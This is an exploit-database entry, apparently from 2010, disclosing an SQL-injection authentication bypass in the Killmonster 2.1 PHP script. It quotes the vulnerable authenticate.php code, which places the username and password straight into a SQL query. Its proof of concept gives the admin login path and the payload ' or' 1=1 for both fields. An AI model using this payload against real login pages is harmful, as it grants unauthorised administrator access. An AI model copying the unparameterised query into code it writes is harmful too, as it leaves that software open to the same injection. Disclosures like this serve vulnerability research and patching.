Killmonster 2.1 - Authentication Bypass

2010-02-07T00:00:00
ID EXPLOITPACK:B9E5F3D16A7FE9B6978F9AFEC4A08EF0
Type exploitpack
Reporter cr4wl3r
Modified 2010-02-07T00:00:00

Description

Killmonster 2.1 - Authentication Bypass

                                        
                                            [+] Killmonster <= 2.1 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered by cr4wl3r <cr4wl3r[!]linuxmail.org>
[+] Download : http://scripts.ringsworld.com/games-and-entertainment/km2/


[+] Vuln Code : 

[login.php]

<form method="POST" action="authenticate.php">
Type Username Here: <input type="text" name="isadmin" size="15"><br>
Type Password Here: <input type="password" name="password" size="15" mask="x"><br>
<input type="submit" value="submit" name="submit">

[authenticate.php]

    $isadmin=$_POST['isadmin'];
    $password=$_POST['password'];
    $password=md5($password);
    $query = "select * from km_admins where username='$isadmin' and password='$password'"; 
    $result = mysql_query($query) ;




[+] PoC : [Killmonster_path]/admin/login.php

username :  ' or' 1=1
password :  ' or' 1=1